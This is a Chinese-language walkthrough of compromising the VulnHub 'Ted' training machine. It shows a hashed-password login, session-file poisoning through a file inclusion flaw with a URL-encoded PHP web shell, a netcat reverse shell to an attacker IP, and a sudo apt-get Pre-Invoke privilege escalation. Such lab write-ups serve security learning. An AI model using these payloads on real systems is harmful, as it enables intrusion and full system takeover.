【vulnhub】Ted 靶机

一、信息收集

1.查看MAC地址

2.主机探测

3.查看端口服务

只有一个端口开放

4.目录扫描

拼接打开后并没有发现什么信息

二、内网渗透

打开页面，是一个登陆窗口

进行弱口令登陆，登陆失败

burp抓包进行测试，发现需要使用hash加密

将admin进行加密试试

加密后的值（转换大小写后）为：8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

再次尝试登陆，登陆成功

经过测试，发现在搜索框处存在任意文件读取漏洞

尝试包含用来存储用户session的文件，从而获取shell：

在Linux下 PHP语言的session的存储路径如下：

/tmp 或 /var/lib/php/sess_[PHPSESSID]

/var/lib/php5/sess_[PHPSESSID]

/var/lib/php/sessions/sess_[PHPSESSID]

抓取一个有session的请求包，拿到session：

拼接如下路径search读取：

/var/lib/php/sessions/sess_on7urcu3fbbatc5sqc4jkofpp4

抓包将数据包放到重放模块里进行测试，发现可以修改user_pref变量的值，从而写入到session文件中，再结合文件包含漏洞，造成RCE的漏洞

写入URL编码后的一句话木马

%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E

搜索框处输入命令看看是否被执行，发现成功执行

写入反弹shell语句

nc+192.168.172.131+4444+-e+/bin/bash

kali监听，成功反弹

获取一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

三、提权

sudo -l

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

提权成功